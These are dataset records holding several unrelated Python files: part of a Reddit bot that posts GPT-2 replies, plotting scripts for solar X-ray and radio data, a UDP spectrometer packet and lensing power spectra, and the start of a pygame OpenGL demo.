resp.split('<|endoftext|>'.encode('utf-8'))[0]\n sp = resp.splitlines()\n self.log(\"Split len\", len(sp))\n out = \"\"\n\n ctr = 0\n lp = len(sp)\n stop = False\n pref = \"**OUTPUT\"\n if user is not None:\n pref += \" (courtesy of u/\" + user.name + \"):**\"\n else:\n pref += \"**\"\n iop = \"\\n\"\n for iline in inp.splitlines():\n iop += \"> **\" + iline.strip() + \"** \\n\"\n while ctr < len(sp):\n if len(sp[0]) > 0 and ord('=') in sp[0][:min(2, len(sp[0]))] and not stop:\n stop = True\n del sp[0]\n if len(sp) < 1 or ctr == (lp-1):\n break\n lp = len(sp)\n out += \"> \" + sp[ctr].decode() + \"\\n\"\n ctr += 1\n if len(out) > len(inp):\n break\n return str(pref + iop + \"\\n\" + out + \"\\nBeep boop, I'm a bot.\")\n\n def message_guy(self):\n self.log(\"MESSAGE GUY STARTING\\n\")\n for message in self.reddit.inbox.unread(limit=None):\n if isinstance(message, praw.models.Message):\n self.log(\"Found a DM!\\n\", silent=True)\n cb = \"\"\n for line in message.body.splitlines():\n if line.strip():\n insensitive_hippo = re.compile(re.escape('**INPUT(.*):**'), re.IGNORECASE)\n insensitive_d = re.compile(re.escape(\"Beep boop, I'm a bot.\"), re.IGNORECASE)\n cb += str(insensitive_hippo.sub('', str(insensitive_d.sub('', line))))\n cb = clean_input(cb)\n\n if len(cb.strip()) < 2:\n self.log(\"Parent comment was empty\", silent=True)\n continue\n\n self.lock.acquire()\n response = self.clean_response(self.get_response(cb), cb)\n self.log(\"Bot replying to direct message: \"+cb)\n self.log(\"Response : \"+response+\"\\n------------------------------------------------\")\n self.lock.release()\n try:\n if not response:\n self.log(\"Response was empty\")\n continue\n message.reply(response)\n message.mark_read()\n except:\n self.log(\"An error occured while replying\")\n \n\n def run(self, n_threads, subm):\n def do_work(self, comment):\n if not isinstance(comment, praw.models.Comment):\n return\n if comment.author is None or comment.author.name == self.name:\n return\n if self.rexp.match(clean_input(comment.body)) is None:\n return\n for h in comment.replies:\n if h.author.name == self.name:\n return\n try:\n cp = comment.parent()\n\n if isinstance(cp, praw.models.Submission):\n self.log(\"Parent was a submission...\\n\", silent=True)\n return\n else:\n for h in cp.replies:\n if h.author is None:\n continue\n if h.author.name == self.name:\n self.log(\"Already replied to this 
comment...\\n\", silent=True)\n return\n except:\n self.log(\"Unknown error occured\")\n return\n self.log(\"Found one!\")\n cb = \"\"\n for line in cp.body.splitlines():\n if line.strip():\n insensitive_hippo = re.compile(re.escape('**INPUT(.*):**'), re.IGNORECASE)\n insensitive_d = re.compile(re.escape(\"Beep boop, I'm a bot.\"), re.IGNORECASE)\n cb += str(insensitive_hippo.sub('', str(insensitive_d.sub('', line))))\n cb = clean_input(cb)\n cpl = \"https://www.reddit.com\" + cp.permalink\n\n if len(cb.strip()) < 2:\n self.log(\"Parent comment was empty\")\n return\n elif cb.strip() == \"[removed]\":\n self.log(\"Parent comment was removed\")\n return\n\n self.lock.acquire()\n response = self.clean_response(self.get_response(cb), cb, comment.author)\n self.log(\"Bot replying to : \"+cb+\"\\nURL : \"+cpl)\n self.log(\"Response : \"+response+\"\\n------------------------------------------------\")\n self.lock.release()\n try:\n if not response:\n self.log(\"Response was empty\")\n return\n cp.reply(response)\n except:\n self.log(\"An error occured while replying\")\n return\n\n self.log(\"Starting Submission Run... \"+str(time.time()))\n submission = praw.models.Submission(self.reddit, id=subm)\n submission.comments.replace_more(limit=None)\n with parallel_backend('threading', n_jobs=n_threads):\n Parallel()(delayed(do_work)(self, comment) for comment in tqdm.tqdm(submission.comments.list()) if comment is not None)\n self.log(\"SUBMISSION RUN DONE!!!\\n\\n============================================================\\n\", flush=True)\n\n def should_add_to_list(self, subm):\n if self.key_word in subm.title.lower():\n self.lock.acquire()\n self.log(\"\\nFound a new submission about \"+self.key_word+\"\\nURL: \"+subm.permalink)\n self.stream_list.append(subm.id)\n self.lock.release()\n\n def run_mt(self, n_threads):\n def do_work(self, comment):\n if not self.t_man:\n self.t_man = True\n self.lock.acquire()\n self.log(\"\\n================ RUNNING SUBMISSION SWEEP ================\\n\\n\")\n self.lock.release()\n with parallel_backend('threading', n_jobs=4):\n Parallel()(delayed(self.run)(16, subm) for subm in tqdm.tqdm(self.stream_list.list))\n self.message_guy()\n time.sleep(900)\n self.t_man = False\n elif not self.stream_guy:\n self.stream_guy = True\n self.lock.acquire()\n self.log(\"\\n================ RUNNING SUBMISSION STREAM ================\\n\\n\")\n self.lock.release()\n all = self.reddit.subreddit('all')\n with parallel_backend('threading', n_jobs=4):\n Parallel()(delayed(self.should_add_to_list)(submission) for submission in tqdm.tqdm(all.stream.submissions(skip_existing=True)))\n\n if not isinstance(comment, praw.models.Comment):\n return\n if comment.author is None or comment.author.name == self.name:\n return\n if self.rexp.match(clean_input(comment.body)) is None:\n return\n for h in comment.replies:\n if h.author.name == self.name:\n return\n self.log(\"Found one!\")\n\n try:\n cp = comment.parent()\n\n if isinstance(cp, praw.models.Submission):\n self.log(\"Parent was a submission...\\n\")\n return\n else:\n for h in cp.replies:\n if h.author is None:\n continue\n if h.author.name == self.name:\n self.log(\"Already replied to this comment...\\n\")\n return\n except:\n self.log(\"An unknown error occured.\\n\")\n return\n\n cb = \"\"\n for line in cp.body.splitlines():\n if line.strip():\n insensitive_hippo = re.compile(re.escape('**OUTPUT(.*):**'), re.IGNORECASE)\n insensitive_s = re.compile(re.escape('> '))\n insensitive_d = re.compile(re.escape(\"Beep boop, I'm a bot.\"), 
re.IGNORECASE)\n cb += str(insensitive_hippo.sub('', str(insensitive_d.sub('', str(insensitive_s.sub('', line.strip())))))) + \"\\n\"\n cb = clean_input(cb)\n cpl = \"https://www.reddit.com\" + cp.permalink\n\n if len(cb.strip()) < 1:\n self.log(\"Parent comment was empty\")\n return\n elif cb.strip() == \"[removed]\":\n self.log(\"Parent comment was removed\")\n return\n\n self.lock.acquire()\n if comment.subreddit.name == \"politics\":\n response = self.clean_response(self.get_response(cb), cb)\n else:\n response = self.clean_response(self.get_response(cb), cb, comment.author)\n self.log(\"Bot replying to : \"+cb+\"\\nURL : \"+cpl)\n self.log(\"Response : \"+response+\"\\n------------------------------------------------\")\n self.lock.release()\n try:\n if not response:\n self.log(\"Response was empty\")\n return\n cp.reply(response)\n except:\n self.log(\"An error occured while replying\")\n return\n\n self.log(\"Starting Run... \"+str(time.time()))\n # Get the top 5 values from our subreddit\n all = self.reddit.subreddit('all')\n with parallel_backend('threading', n_jobs=n_threads):\n Parallel()(delayed(do_work)(self, comment) for comment in tqdm.tqdm(all.stream.comments(skip_existing=True)))\n\n self.log(\"DONE!!!\\n\\n============================================================\\n\")\n\nwith open(\"./reddit_bot_logs.txt\", 'a+') as log:\n w = sys.stdout.write\n def wlog(data, flush=False, silent=False):\n data += \"\\n\"\n if not silent:\n w(data)\n log.write(data)\n if flush:\n log.flush()\n bot = GPT2Bot(wlog)\n bot.run_loop()\n", "sub_path": "reddit_bot.py", "file_name": "reddit_bot.py", "file_ext": "py", "file_size_in_byte": 12679, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "string.printable", "line_number": 23, "usage_type": "attribute"}, {"api_name": "threading.Lock", "line_number": 48, "usage_type": "call"}, {"api_name": "praw.Reddit", "line_number": 51, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 52, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 52, "usage_type": "attribute"}, {"api_name": "re.DOTALL", "line_number": 52, "usage_type": "attribute"}, {"api_name": "pexpect.spawn", "line_number": 74, "usage_type": "call"}, {"api_name": "pexpect.exceptions", "line_number": 80, "usage_type": "attribute"}, {"api_name": "sample.decode", "line_number": 84, "usage_type": "call"}, {"api_name": "praw.models", "line_number": 120, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 125, "usage_type": "call"}, {"api_name": "re.escape", "line_number": 125, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 125, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 126, "usage_type": "call"}, {"api_name": "re.escape", "line_number": 126, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 126, "usage_type": "attribute"}, {"api_name": "praw.models", "line_number": 151, "usage_type": "attribute"}, {"api_name": "praw.models", "line_number": 163, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 180, "usage_type": "call"}, {"api_name": "re.escape", "line_number": 180, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 180, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 181, "usage_type": "call"}, {"api_name": "re.escape", "line_number": 181, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 181, "usage_type": "attribute"}, 
{"api_name": "time.time", "line_number": 207, "usage_type": "call"}, {"api_name": "praw.models.Submission", "line_number": 208, "usage_type": "call"}, {"api_name": "praw.models", "line_number": 208, "usage_type": "attribute"}, {"api_name": "joblib.parallel_backend", "line_number": 210, "usage_type": "call"}, {"api_name": "joblib.Parallel", "line_number": 211, "usage_type": "call"}, {"api_name": "joblib.delayed", "line_number": 211, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 211, "usage_type": "call"}, {"api_name": "joblib.parallel_backend", "line_number": 228, "usage_type": "call"}, {"api_name": "joblib.Parallel", "line_number": 229, "usage_type": "call"}, {"api_name": "joblib.delayed", "line_number": 229, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 229, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 231, "usage_type": "call"}, {"api_name": "joblib.parallel_backend", "line_number": 239, "usage_type": "call"}, {"api_name": "joblib.Parallel", "line_number": 240, "usage_type": "call"}, {"api_name": "joblib.delayed", "line_number": 240, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 240, "usage_type": "call"}, {"api_name": "praw.models", "line_number": 242, "usage_type": "attribute"}, {"api_name": "praw.models", "line_number": 256, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 273, "usage_type": "call"}, {"api_name": "re.escape", "line_number": 273, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 273, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 274, "usage_type": "call"}, {"api_name": "re.escape", "line_number": 274, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 275, "usage_type": "call"}, {"api_name": "re.escape", "line_number": 275, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 275, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 304, "usage_type": "call"}, {"api_name": "joblib.parallel_backend", "line_number": 307, "usage_type": "call"}, {"api_name": "joblib.Parallel", "line_number": 308, "usage_type": "call"}, {"api_name": "joblib.delayed", "line_number": 308, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 308, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 313, "usage_type": "attribute"}]} +{"seq_id": "594038772", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 12 02:08:41 2021\n\n@author: svlesovoi\n\"\"\"\n\nimport json\nimport numpy as NP\nimport pylab as PL\nfrom astropy.io import fits\nfrom scipy import signal\n\ndef hhmm_format(t, pos):\n hh = (int)(t / 3600.);\n t -= hh*3600.;\n mm = (int)(t / 60.);\n return '%02d:%02d' % (hh,mm);\n\nwin = signal.windows.gaussian(2199,2155)\nrainbowColors = PL.get_cmap('rainbow')\n\n#goesFile = open('xrays-6-hour.json')\ngoesFile = open('xrays-1-day.json')\ngoesData = json.load(goesFile)\ngoesFile.close()\n\nN = len(goesData)\nxrays_time = NP.zeros(N//2)\nxrays_4_8 = NP.zeros(N//2)\nxrays_005_04 = NP.zeros(N//2)\n\nfor i in range(N):\n if i%2:\n xrays_4_8[i//2] = goesData[i]['flux']\n hhmm = goesData[i]['time_tag'].split('T')[1].split(':')[0:2]\n xrays_time[i//2] = 3600*int(hhmm[0]) + 60*int(hhmm[1])\n if xrays_time[i//2] > 10*3600:\n xrays_time[i//2] -= 24*3600\n else:\n xrays_005_04[i//2] = goesData[i]['flux']\n\ncF = fits.open('srh_cp_20210412.fits')\nsrhFreqList = cF[1].data['frequencies']\nsrhTime = cF[2].data['time'] # necc\nsrhCorrI = cF[2].data['I']\nsrhCorrV = 
cF[2].data['V']\nsrhFluxI = cF[2].data['flux_I'] # necc\nsrhMeanFluxI = srhFluxI.mean(axis=0)\nsrhMeanFluxISmoothed = signal.convolve(srhMeanFluxI,win,mode='same')/win.sum()\n\nt0 = 200\n\nfig = PL.figure()\nsub = fig.add_subplot(1,1,1);\nsub.set_ylabel('flux');\nsub.set_xlabel('UT');\nsub.xaxis.set_major_locator(PL.MultipleLocator(1800));\nsub.xaxis.set_major_formatter(PL.FuncFormatter(hhmm_format));\nsub.xaxis.set_minor_locator(PL.MultipleLocator(600));\nsub.set_xlim(3600,6.0*3600)\nsub.set_ylim(0,5e-7)\n\nsub.plot(xrays_time[t0:],xrays_4_8[t0:],label='GOES X-Ray 0.1-0.8 nm',color='red',markersize=0.2)\nsub.plot(xrays_time[t0:],xrays_005_04[t0:],label='GOES X-Ray 0.05-0.4 nm',color='blue',markersize=0.2)\nfor freq in range(srhFreqList.shape[0]):\n sub.plot(srhTime[freq],srhCorrI[freq]*1e-4,'.',markersize=0.2,color=rainbowColors(100+(srhFreqList.shape[0] - freq)*20),label='SRH %d MHz'%(srhFreqList[freq]*1e-3))\n# sub.plot(srhTime[freq],srhCorrV[freq]*1e-4)\n#sub.plot(srhTime[0],(srhMeanFluxI - srhMeanFluxISmoothed)*5e-9 + 1e-8)\nsub.plot([3600,10*3600],[1e-7,1e-7], label='X-ray flare class A')\nsub.grid()\nsub.legend(markerscale=50)\nsub.set_title('SRH and GOES incredible coincidence , %s'%(cF[0].header['DATE-OBS']))\n", "sub_path": "srhGoesXray.py", "file_name": "srhGoesXray.py", "file_ext": "py", "file_size_in_byte": 2366, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "scipy.signal.windows.gaussian", "line_number": 21, "usage_type": "call"}, {"api_name": "scipy.signal.windows", "line_number": 21, "usage_type": "attribute"}, {"api_name": "scipy.signal", "line_number": 21, "usage_type": "name"}, {"api_name": "pylab.get_cmap", "line_number": 22, "usage_type": "call"}, {"api_name": "json.load", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 32, "usage_type": "call"}, {"api_name": "astropy.io.fits.open", "line_number": 44, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 44, "usage_type": "name"}, {"api_name": "scipy.signal.convolve", "line_number": 51, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 51, "usage_type": "name"}, {"api_name": "pylab.figure", "line_number": 55, "usage_type": "call"}, {"api_name": "pylab.MultipleLocator", "line_number": 59, "usage_type": "call"}, {"api_name": "pylab.FuncFormatter", "line_number": 60, "usage_type": "call"}, {"api_name": "pylab.MultipleLocator", "line_number": 61, "usage_type": "call"}]} +{"seq_id": "39072350", "text": "#!/opt/vegas/bin/python2.6\n\nimport socket\nfrom matplotlib import pyplot as plt\nimport struct\nimport numpy as np\n\nudp_ip='10.0.0.145'\nudp_port=60000\nsize=8208 #packet size\nf_lo = 93.75\nbw=2*f_lo\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\nsock.bind((udp_ip, udp_port))\ndata, addr = sock.recvfrom(size)\nsock.close()\n\na = np.array(struct.unpack('>8208b', data), dtype=np.int8)\na = a[16:] # skip 16-byte header\n#{0, 2, 1, 3} # 2 tones\n#{0, 2, 3, 1}\n#{1, 3, 0, 2}\n#{1, 3, 2, 0}\n#{2, 0, 1, 3}\n#{2, 0, 3, 1}\n#{3, 1, 0, 2}\n#{3, 1, 2, 0}\nrealX = a[0::4]\nimagX = a[1::4]\nrealY = a[2::4]\nimagY = a[3::4]\n\nplt.subplot(421)\nplt.plot(realX, '-o')\nplt.subplot(423)\nplt.plot(imagX, '-o')\nplt.subplot(425)\nplt.plot(realY, 
'-o')\nplt.subplot(427)\nplt.plot(imagY, '-o')\n\nf = np.linspace(f_lo - bw/2., f_lo + bw/2., 2048)\n\nX = np.zeros(2048, dtype=np.complex64)\nX.real = realX.astype(np.float)\nX.imag = imagX.astype(np.float)\n\nY = np.zeros(2048, dtype=np.complex64)\nY.real = realY.astype(np.float)\nY.imag = imagY.astype(np.float)\n\nplt.subplot(422)\nplt.plot(f, 10 * np.log10(np.abs(np.fft.fftshift(np.fft.fft(X, 2048)))))\n\nplt.subplot(424)\nplt.plot(f, 10 * np.log10(np.abs(np.fft.fftshift(np.fft.fft(Y, 2048)))))\n\nplt.subplot(426)\nplt.plot(f, 10 * np.log10(np.fft.fftshift(np.fft.fft(X, 2048) * np.fft.fft(Y, 2048).conjugate()).real))\n\nplt.subplot(428)\nplt.plot(f, 10 * np.log10(np.fft.fftshift(np.fft.fft(X, 2048) * np.fft.fft(Y, 2048).conjugate()).imag))\n\nplt.show()\n\n", "sub_path": "scripts/l1_lbw1/plot_raw_l1.py", "file_name": "plot_raw_l1.py", "file_ext": "py", "file_size_in_byte": 1523, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "socket.socket", "line_number": 14, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 14, "usage_type": "attribute"}, {"api_name": "socket.SOCK_DGRAM", "line_number": 14, "usage_type": "attribute"}, {"api_name": "socket.SOL_SOCKET", "line_number": 15, "usage_type": "attribute"}, {"api_name": "socket.SO_REUSEADDR", "line_number": 15, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 20, "usage_type": "call"}, {"api_name": "struct.unpack", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.int8", "line_number": 20, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.complex64", "line_number": 46, "usage_type": "attribute"}, {"api_name": "numpy.float", "line_number": 47, "usage_type": "attribute"}, {"api_name": "numpy.float", "line_number": 48, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.complex64", "line_number": 50, "usage_type": "attribute"}, {"api_name": "numpy.float", "line_number": 51, "usage_type": "attribute"}, {"api_name": "numpy.float", "line_number": 52, "usage_type": 
"attribute"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "numpy.log10", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.fft.fftshift", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 55, "usage_type": "attribute"}, {"api_name": "numpy.fft.fft", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "numpy.log10", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.fft.fftshift", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 58, "usage_type": "attribute"}, {"api_name": "numpy.fft.fft", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "numpy.log10", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.fft.fftshift", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 61, "usage_type": "attribute"}, {"api_name": "numpy.fft.fft", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 64, "usage_type": "name"}, {"api_name": "numpy.log10", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.fft.fftshift", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 64, "usage_type": "attribute"}, {"api_name": "numpy.fft.fft", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}]} +{"seq_id": "111569849", "text": "## SY 27/6/19\n## Plots true_corr power spectra for different datasets.\n\nfrom astropy.io import fits\nimport healpy as hp\nimport scipy as sp\nimport numpy as np\nimport pylab as P\nimport kappa_lya\nfrom kappa_lya import *\nimport sys\nfrom collections import OrderedDict\nimport matplotlib.gridspec as gridspec\nfrom matplotlib.offsetbox import AnchoredText\n\n\ndef get_model(c_ell):\n y = (c_ell / cl_input)\n x = np.arange(y.size)\n z = np.polyfit(x, y, 5)\n model = np.polyval(z, x)\n return model, x\n\n\nesttype = 'midpoint'\n\n##- Open kappa true-correlation and input c_ells\ncl_noisy = np.loadtxt('maps/midpoint/true_corr/Cls/Cl_autos_noisy_rt70.txt')\nclx_noisy = np.loadtxt('maps/midpoint/true_corr/Cls/Cl_crosses_noisy_rt70.txt')\n\ncl_cut = 
np.loadtxt('maps/midpoint/true_corr/Cls/Cl_autos_cut_rt70.txt')\nclx_cut = np.loadtxt('maps/midpoint/true_corr/Cls/Cl_crosses_cut_rt70.txt')\n\ncl_noiseless = np.loadtxt('maps/midpoint/true_corr/Cls/Cl_autos_noiseless_rt70.txt')\nclx_noiseless = np.loadtxt('maps/midpoint/true_corr/Cls/Cl_crosses_noiseless_rt70.txt')\n\ncl_input = np.loadtxt('maps/input/Cl_xi_input.txt')\ninput_mean = np.loadtxt('maps/input/Cl_input_mean.txt')\n\nx = []\nmodel = []\nkappa_true = [cl_noisy, clx_noisy, cl_cut, clx_cut, cl_noiseless, clx_noiseless]\nfor i in kappa_true:\n mod, ell_true = get_model(i)\n model.append(mod)\n x.append(ell_true)\n \n\n##- Setup figures\nP.rcParams.update({'font.size':18})\nP.ion()\nncolors=9\ncolors = P.cm.Set1(np.linspace(0,1,ncolors))\n#colors=['#396AB1','#DA7C30','#3E9651','#CC2529','#535154','#6B4C9A','#922428','#948B3D']\n\n##- Plot figure\nP.figure(figsize=(8.2,6))\n#P.plot(input_mean[0], color=colors[1], linewidth=2.0, linestyle=\"-\",label='Masked Input')\n\nP.plot(cl_noisy, color=colors[2], lw=2, linestyle=\"-\",label='Noisy Auto')\nP.plot(clx_noisy, color=colors[2], lw=2, linestyle=\"--\",label='Noisy Cross')\nP.plot(cl_cut, color=colors[3], lw=2, linestyle=\"-\",label='Noiseless Auto')\nP.plot(clx_cut, color=colors[3], lw=2, linestyle=\"--\",label='Noiseless cross')\nP.plot(cl_noiseless, color=colors[4], lw=2, linestyle=\"-\",label='High Density Auto')\nP.plot(clx_noiseless, color=colors[4], lw=2, linestyle=\"--\",label='High Density Cross')\n\nP.title('True_corr')\nP.axhline(0., color='k', ls=':')\nP.ylabel(r'$\\ell \\ C_{\\ell}^{\\rm{true, est}}$', fontsize=18)\nP.xlabel(r'$\\ell$', fontsize=18)\nP.xlim([0, 800])\n#P.ylim([0.0, 1.1e-6])\nP.ticklabel_format(style='sci', axis='y', scilimits=(0,0), useOffset=False)\nhandles, labels = P.gca().get_legend_handles_labels()\nby_label = OrderedDict(zip(labels, handles))\nP.legend(by_label.values(), by_label.keys(), numpoints = 1, loc = 'upper right', fontsize=16)\n\n\n", "sub_path": "bin/plot_true_corrs.py", "file_name": "plot_true_corrs.py", "file_ext": "py", "file_size_in_byte": 2652, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "numpy.arange", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.polyval", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 38, "usage_type": "call"}, {"api_name": "pylab.rcParams.update", "line_number": 50, "usage_type": "call"}, {"api_name": "pylab.rcParams", "line_number": 50, "usage_type": "attribute"}, {"api_name": "pylab.ion", "line_number": 51, "usage_type": "call"}, {"api_name": "pylab.cm.Set1", "line_number": 53, "usage_type": "call"}, {"api_name": "pylab.cm", "line_number": 53, "usage_type": "attribute"}, {"api_name": "numpy.linspace", "line_number": 53, "usage_type": "call"}, {"api_name": "pylab.figure", "line_number": 57, "usage_type": "call"}, {"api_name": "pylab.plot", "line_number": 60, 
"usage_type": "call"}, {"api_name": "pylab.plot", "line_number": 61, "usage_type": "call"}, {"api_name": "pylab.plot", "line_number": 62, "usage_type": "call"}, {"api_name": "pylab.plot", "line_number": 63, "usage_type": "call"}, {"api_name": "pylab.plot", "line_number": 64, "usage_type": "call"}, {"api_name": "pylab.plot", "line_number": 65, "usage_type": "call"}, {"api_name": "pylab.title", "line_number": 67, "usage_type": "call"}, {"api_name": "pylab.axhline", "line_number": 68, "usage_type": "call"}, {"api_name": "pylab.ylabel", "line_number": 69, "usage_type": "call"}, {"api_name": "pylab.xlabel", "line_number": 70, "usage_type": "call"}, {"api_name": "pylab.xlim", "line_number": 71, "usage_type": "call"}, {"api_name": "pylab.ticklabel_format", "line_number": 73, "usage_type": "call"}, {"api_name": "pylab.gca", "line_number": 74, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 75, "usage_type": "call"}, {"api_name": "pylab.legend", "line_number": 76, "usage_type": "call"}]} +{"seq_id": "419683226", "text": "import pygame\nfrom rpigl import glesutils, transforms\nfrom rpigl.gles2 import *\n\nvertices = [(0.0,0.0,0.0), (0.5,0.0,0.0), (0.5,0.5,0.0), (0.0, 0.5,0.0), \n (0.0,0.0,-0.5), (0.5,0.0,-0.5), (0.5,0.5,-0.5), (0.0, 0.5,-0.5)]\n\nouter_vertices = [(-0.5, -0.5, 0.5), (0.5, -0.5, 0.5), (0.5, 0.5, 0.5), (-0.5, 0.5, 0.5),\n (-0.5, -0.5, -0.5), (0.5, -0.5, -0.5), (0.5, 0.5, -0.5), (-0.5, 0.5, -0.5)]\n\nindices_face_1 = (0, 1, 2, 0, 3)\n\nindices_face_2 = (4, 5, 6, 4, 7)\n\nindices_face_3 = (1, 5, 6, 1, 2)\n\nindices_face_4 = (0, 4, 7, 0 ,3)\n\nindices_outer = (0, 1, 2, 3, 0, 4, 5, 1, 5, 6, 2, 6, 7, 3, 7, 4)\n\nindices_points = (0, 1, 2, 3)\n\narray_spec = glesutils.ArraySpec(\"vertex_attrib:3f\")\n\nvertex_glsl = array_spec.glsl() + \"\"\"\nuniform mat4 transform_matrix;\nvoid main(void) {\n gl_Position = transform_matrix * vec4(vertex_attrib, 1.0);\n gl_PointSize = 2.0;\n}\n\"\"\"\n\nfragment_glsl = \"\"\"\nuniform vec4 color;\nvoid main(void) {\n gl_FragColor = color;\n}\n\"\"\"\n\n\n\nclass MyWindow(glesutils.GameWindow):\n\n def init(self):\n\n self.angle = 10\n self.framerate = 20\n\n self.vertex_shader = 